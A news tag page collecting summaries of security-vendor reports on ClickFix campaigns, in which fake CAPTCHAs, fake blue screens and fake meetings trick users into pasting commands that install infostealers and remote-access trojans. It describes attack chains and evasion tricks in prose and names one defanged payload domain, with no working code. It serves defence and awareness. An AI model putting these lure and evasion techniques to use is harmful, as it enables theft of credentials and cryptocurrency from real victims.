All news with #clickfix tag

🛡️ Sophos researchers identified three ClickFix campaigns that used malicious search ads and trusted-host lures to coax macOS users into pasting and executing terminal commands, resulting in the deployment of the MacSync infostealer. The campaigns—first observed in November and December 2025 and refreshed in February 2026—leveraged fake Google Sites, ChatGPT conversation redirects, and GitHub-style pages. The February variant introduced dynamic AppleScript and in-memory execution to harvest credentials, keychain data, files, and crypto seed phrases while attempting to erase traces.

🔒 Researchers warn that criminals have scaled ClickFix social-engineering lures to deliver sophisticated, fileless infostealers via compromised WordPress sites. Rapid7 observed a campaign active since December 2025 that leveraged fake Cloudflare CAPTCHA prompts across more than 250 WordPress domains in 12 countries to trick victims into running obfuscated commands. The chain deploys an in-memory loader called DoubleDonut that injects payloads into legitimate Windows processes, and analysts also observed novel .NET and C++ stealers alongside a new Vidar variant. Microsoft noted a separate campaign that pivots from the Run dialog to Windows Terminal for execution.

🔎 Atos researchers disclosed a ClickFix variation that leverages the Run dialog to execute a 'net use' command, map a remote WebDAV share, and run a hosted batch file. The chain downloads a ZIP that unpacks a trojanized WorkFlowy Electron app whose app.asar contains an obfuscated main.js acting as a persistent C2 beacon and dropper. The campaign evaded Microsoft Defender for Endpoint and was detected through targeted hunting of RunMRU registry activity.

🔒 Rapid7 has identified a widespread campaign that compromises legitimate WordPress websites to infect visitors with infostealer malware. Attackers display a convincing fake Cloudflare CAPTCHA and use the ClickFix social‑engineering trick to prompt victims to paste commands into Windows Run, initiating staged downloads. Observed payloads include Vidar, Impure, Vodka and Double Donut. Site administrators are urged to update components, enable MFA, use strong passwords and avoid executing untrusted code on credential-bearing devices.

🔒 Researchers at MalBeacon observed the threat actor Velvet Tempest using a ClickFix malvertising chain to trick victims into pasting obfuscated commands into the Windows Run dialog. Operators leveraged nested cmd.exe chains and legitimate utilities (including finger.exe and csc.exe) to stage loaders, compile .NET components, and deploy Python-based persistence under C:\ProgramData. The intrusion staged DonutLoader and retrieved the CastleRAT backdoor, though Termite ransomware was not deployed during the observed exercise.

⚠ Attackers have shifted ClickFix phishing to use the Windows + X → I shortcut to open Windows Terminal, prompting victims to paste malicious PowerShell via fake CAPTCHAs and verification prompts. This avoids detections focused on Run (Win+R) and undermines basic security training. Microsoft says the campaign launches layered, persistent chains that decode embedded hex, download a renamed 7-Zip binary to extract payloads, establish persistence, apply Defender exclusions, and exfiltrate data.

⚠️ Microsoft disclosed a ClickFix social engineering campaign observed in February 2026 that leverages the Windows Terminal app to execute malicious commands and deliver the Lumma Stealer. Attackers instruct targets to open Windows Terminal (wt.exe) via Windows+X → I and paste hex‑encoded, XOR‑compressed commands from fake CAPTCHA or troubleshooting pages, avoiding Run‑dialog detection. The decoded chain downloads a ZIP and a renamed 7‑Zip binary to extract payloads, sets persistence, configures Defender exclusions, and injects the stealer into browser processes to harvest stored credentials.

⚠️The QuickLens Chrome extension was removed from the Chrome Web Store after a malicious update (v5.8) was pushed that added info‑stealing and ClickFix attack functionality. Security researchers found the extension stripped security headers, added powerful permissions, and contacted a command‑and‑control server to fetch and run payloads on every page. A fake Google Update prompt led to malware that targeted Windows and attempted to steal browser credentials and cryptocurrency seed phrases. Google has disabled the extension; affected users should remove it, scan devices, reset passwords, and move funds from compromised wallets.

🔒 The Kaspersky Team outlines evolving variations of the ClickFix social‑engineering technique, where attackers trick users into executing malicious commands on their own machines. Recent campaigns abuse legitimate utilities such as mshta.exe, nslookup and the legacy Finger protocol, and have used platforms like TikTok, Pastebin and fake extension pages to prompt victims to run code. Observed payloads include infostealers and remote access trojans such as ModeloRAT. Organizations are advised to prioritize user awareness and robust endpoint and XDR controls to mitigate these risks.

⚠️ Microsoft has identified a novel ClickFix social-engineering variant that instructs victims to run an nslookup against an attacker-controlled resolver to retrieve a malicious PowerShell script embedded in the DNS NAME field. The response is parsed and executed via cmd.exe, then pulls a second-stage ZIP containing a Python runtime and scripts that lead to the ModeloRAT remote-access trojan. Organizations should monitor unusual DNS queries to untrusted nameservers and apply endpoint controls to block unauthorized script execution and persistence.

🚨 Threat actors are abusing Pastebin comments to promote a ClickFix-style social engineering campaign that tricks cryptocurrency users into executing JavaScript in their browser, enabling attackers to hijack Bitcoin swap transactions on Swapzone.io. Victims are directed to copy a javascript: snippet from a hosted paste and execute it in the address bar; the injected, obfuscated payload overrides the exchange's swap logic and replaces deposit addresses with attacker-controlled wallets. The code also tampers with displayed rates and offers to simulate successful arbitrage. Because the script runs within the victim's authenticated session, the interface looks legitimate while funds are irreversibly redirected to attackers.

🔍 Microsoft disclosed a DNS-based evolution of the ClickFix social-engineering tactic that coerces victims into running nslookup via the Windows Run dialog to retrieve a second-stage payload. The initial cmd.exe command queries a hard-coded external DNS server and extracts the Name: response to execute the next stage. The staged payload downloads a ZIP from azwsappdev[.]com, runs a malicious Python script, drops a VBScript that launches ModeloRAT, and establishes persistence via a Startup LNK.

🛡️ Bitdefender has identified a sharp increase in LummaStealer infections driven by social‑engineering campaigns that use the ClickFix clipboard trick to deliver the CastleLoader malware. CastleLoader is a heavily obfuscated, script‑based loader that decrypts and executes payloads in memory while adapting persistence and file paths to evade detection. Researchers note a characteristic failed DNS lookup artifact that can aid detection and recommend avoiding pirated or untrusted software and never running PowerShell commands provided by web pages.

🛡️ Mandiant attributes a targeted campaign to North Korean financially motivated group UNC1069, which combines social engineering, deepfake video and macOS malware to steal cryptocurrency and credentials. The attackers hijacked a cryptocurrency executive’s Telegram account to build trust, then sent a calendar invite to a faux Zoom meeting hosted on attacker infrastructure. During the call a purported deepfake of the executive appeared and a ClickFix ruse persuaded victims to run commands, enabling deployment of backdoors and information-stealers.

🔐UNC1069-linked actors used a ClickFix-style social engineering chain to compromise a macOS user at a cryptocurrency/DeFi company. Attackers hijacked a Telegram account, staged a fake Zoom meeting (reportedly using AI-generated video), and instructed the victim to paste curl | zsh commands into Terminal. The resulting infection deployed a multi-stage macOS toolkit—WAVESHAPER, HYPERCALL, HIDDENCALL, DEEPBREATH, and CHROMEPUSH—enabling remote access and data theft. Mandiant provided IOCs and YARA rules to aid detection.

⚠ Microsoft warns that information-stealing campaigns are expanding beyond Windows to target Apple macOS by leveraging cross-platform languages like Python and abusing trusted distribution platforms. Since late 2025, attackers have used malvertising and Google Ads to redirect users to fake sites that employ ClickFix lures and DMG installers to deploy families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. Campaigns use fileless execution, native macOS utilities, and AppleScript to harvest browser credentials, session cookies, iCloud Keychain items, and developer secrets. Organizations are urged to train users on malvertising and fake installers, monitor Terminal and iCloud Keychain access, and inspect network egress for POSTs to newly registered or suspicious domains.

🔒 A recent campaign blends the ClickFix social-engineering method with a fake CAPTCHA and a signed Microsoft App-V script to deliver the Amatera infostealer. Attackers use the trusted SyncAppvPublishingServer.vbs executed via wscript.exe to proxy PowerShell and evade detection, then fetch configuration from a public Google Calendar. Later stages hide encrypted PowerShell payloads in PNGs via LSB steganography and execute Amatera in memory. Researchers recommend removing unused App-V components, restricting the Run dialog, enabling PowerShell logging, and monitoring outbound connection anomalies.

⚠️ Securonix researchers have identified a multi-stage malware campaign, tracked as PHALT#BLYX, that targets hospitality organizations during the holiday season. The attack begins with phishing emails impersonating Booking.com, using urgent, high‑value reservation charges to lure victims to a convincing clone site. Victims are coerced through fake CAPTCHA and simulated BSOD prompts to paste a PowerShell command that downloads a project file executed by MSBuild.exe, culminating in a heavily obfuscated DCRat remote access Trojan. Securonix advises staff training, strict handling of browser‑prompted commands and enhanced monitoring of trusted binaries and process behaviour.

📧 Securonix researchers uncovered PHALT#BLYX, a phishing campaign that uses ClickFix-style lures and counterfeit Booking.com reservation messages to trick hospitality staff into executing commands that pull and run remote code. The landing pages present a fake CAPTCHA then a staged blue screen of death that instructs victims to paste a command into the Windows Run dialog, triggering a PowerShell dropper. That dropper downloads an MSBuild project (v.proj) and invokes MSBuild.exe to configure Defender exclusions, persist in Startup, and retrieve the DCRat remote-access trojan.

🛑 This campaign impersonates Booking.com to redirect hospitality staff to a cloned site that triggers a full-screen fake Windows BSOD. The page instructs victims to paste and run a command that launches PowerShell, compiles a malicious .NET project via MSBuild.exe, and executes a loader. The payload disables Defender exclusions, triggers UAC prompts for elevation, and deploys DCRAT (staxs.exe) which provides remote access and can drop additional tools such as cryptocurrency miners.